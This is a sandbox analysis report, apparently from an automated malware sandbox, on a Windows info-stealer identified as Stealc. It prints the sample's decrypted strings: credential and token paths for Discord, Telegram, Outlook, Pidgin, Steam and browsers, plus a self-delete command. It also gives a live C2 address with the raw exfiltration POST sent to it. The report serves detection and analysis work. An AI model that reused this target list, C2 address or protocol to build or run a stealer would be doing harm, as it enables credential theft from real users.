                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ProductName
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: x32
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: x64
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ProcessorNameString
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DisplayName
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DisplayVersion
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Network Info:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - IP: IP?
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Country: ISO?
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: System Summary:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - HWID:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - OS:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Architecture:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - UserName:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Computer Name:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Local Time:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - UTC:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Language:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Keyboards:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Laptop:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Running Path:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - CPU:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Threads:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Cores:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - RAM:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - Display Resolution:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: - GPU:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: User Agents:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Installed Apps:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: All Users:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Current User:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Process List:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: system_info.txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: freebl3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: mozglue.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: msvcp140.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: nss3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: softokn3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: vcruntime140.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Temp\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: .exe
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: runas
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: open
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: /c start
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %DESKTOP%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %APPDATA%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %LOCALAPPDATA%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %USERPROFILE%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %DOCUMENTS%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %PROGRAMFILES%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %RECENT%
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: *.lnk
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: files
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \discord\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Local Storage\leveldb
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Telegram Desktop\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: key_datas
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: map*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: F8806DD0C461824F*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Telegram
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Tox
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: *.tox
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: *.ini
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Password
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000001
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000002
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000003
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 00000004
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Outlook\accounts.txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Pidgin
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \.purple\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: accounts.xml
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: dQw4w9WgXcQ
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: token:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Software\Valve\Steam
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SteamPath
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \config\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ssfn*
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: config.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DialogConfig.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: libraryfolders.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: loginusers.vdf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Steam\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: browsers
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: done
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: soft
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: \Discord\tokens.txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: https
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: POST
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HTTP/1.1
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: hwid
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: build
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: token
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: file_name
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: file
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: message
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: screenshot.jpg
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C920
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484A477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0484A477
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04847507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_04847507
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484A517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0484A517
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04859297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_04859297
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484CB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0484CB87

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeUnpacked PE file: 0.2.lxEu3xfjIb.exe.400000.0.unpack
                      Source: lxEu3xfjIb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: my_library.pdbU source: lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: my_library.pdb source: lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0484E797
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0484F087
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0484C0A7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0484E177
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04854357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_04854357
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04854DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04854DC7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0484DDE7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04853D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_04853D67
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04841977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04841977
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0484FA17
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04854A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_04854A27

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 95.215.207.176:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://95.215.207.176/d8ddb681db736e16.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 95.215.207.176Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /d8ddb681db736e16.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 95.215.207.176Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 30 45 44 38 43 45 33 42 33 34 37 36 35 32 32 35 30 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="hwid"5130ED8CE3B3476522507------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="build"LogsDiller------BGDAAKJJDAAKFHJKJKFC--
                      Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49720
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:59725
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.215.207.176
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004048D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004048D0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 95.215.207.176Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /d8ddb681db736e16.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 95.215.207.176Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 30 45 44 38 43 45 33 42 33 34 37 36 35 32 32 35 30 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="hwid"5130ED8CE3B3476522507------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="build"LogsDiller------BGDAAKJJDAAKFHJKJKFC--
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/$
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CC4000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.php
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.php&
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.php:
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpH
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpS
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpV
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpf
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.215.207.176/ws
                      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
